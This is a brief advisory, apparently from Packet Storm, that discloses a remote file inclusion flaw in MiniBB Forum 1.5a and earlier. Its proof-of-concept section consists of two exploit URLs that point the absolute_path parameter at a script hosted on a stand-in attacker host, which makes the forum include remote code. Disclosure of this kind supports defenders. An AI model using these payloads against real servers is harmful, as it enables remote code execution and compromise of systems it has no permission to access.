MiniBB Forum versions less than or equal to 1.5a suffer from a remote file inclusion vulnerability. POC included.
c7ad2dbb7c5a92c02e1e4f235e76fbecd92716b3bd6559e1671557664fc4e2de---------------------------------------------------------------------------------
MiniBB Forum <= 1.5a Remote File Include Vulnerabilities
---------------------------------------------------------------------------------
Author : Matdhule
Contact : matdhule@gmail.com
Application : MiniBB Forum (com_minibb.php & index.php)
Version : 1.5a
---------------------------------------------------------------------------------
Exploit :
http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php?absolute_path=http://attacker.com/evil.txt?
---------------------------------------------------------------------------------
Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, & all crews #mardongan, #jambihackerlink @dalnet
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed